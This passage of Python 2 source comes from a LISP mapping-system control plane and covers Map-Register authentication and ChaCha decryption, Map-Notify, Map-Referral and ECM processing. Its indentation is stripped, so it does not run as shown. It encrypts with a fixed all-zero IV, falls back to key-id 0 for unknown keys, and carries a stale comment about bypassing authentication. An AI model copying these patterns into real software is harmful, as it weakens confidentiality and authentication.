sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
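#
# example_cga_sign_and_verify
#
# A minimal sketch of a sign/verify round-trip using the ecdsa library
# conventions noted above: a NIST256p key with hashfunc=hashlib.sha256 on
# both the signing and verifying side. sig_data must be a byte string.
# Hypothetical helper, not the deployed signing flow.
#
def example_cga_sign_and_verify(sig_data):
    import ecdsa as ecdsa_lib
    import hashlib as hashlib_lib
    key = ecdsa_lib.SigningKey.generate(curve=ecdsa_lib.NIST256p)
    sig = key.sign(sig_data, hashfunc=hashlib_lib.sha256)
    vkey = key.get_verifying_key()
    return(vkey.verify(sig, sig_data, hashfunc=hashlib_lib.sha256))
#enddef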
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the xTR address and
# Map-Notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
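#
# example_prune_dict
#
# A minimal sketch of the two-pass pattern above: collect keys first,
# then pop, since a dict must not be mutated while it is being iterated.
# Hypothetical helper, not called anywhere in this module.
#
def example_prune_dict(d, predicate):
    doomed = [k for k in d if predicate(d[k])]
    for k in doomed: d.pop(k)
    return(len(doomed))
#enddef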
#
# lisp_decrypt_map_register
#
# Check if we should just return an unencrypted packet, or decrypt and
# return a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse the first 4 bytes, which are not encrypted. If the packet is not
# encrypted, return to caller. If it is, get the 3-bit key-id next to the
# e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
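#
# example_set_ebit_and_keyid
#
# A minimal sketch of the sender-side counterpart to the parse above: set
# the e-bit and the 3-bit key-id in the first 32-bit word (host byte
# order) of a Map-Register. Hypothetical helper, not called anywhere in
# this module.
#
def example_set_ebit_and_keyid(first_word, ekey_id):
    return(first_word | (1 << 13) | ((ekey_id & 0x7) << 14))
#enddef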
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allow overlapping AMS (accept-more-specifics) registered prefixes. Make
# sure we get the configured parent entry and not the registered
# more-specific. This registration could be a more-specific of the
# registered more-specific entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Register is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack, so we don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find the auth-key, if an
# auth-key was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in the Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop, cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from the cached entry
# that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for the Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by sending to the group itself,
# so we send to the loopback address to bootstrap our membership. We
# join via one other member of the peer-group so we can learn the group
# membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be sourced from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
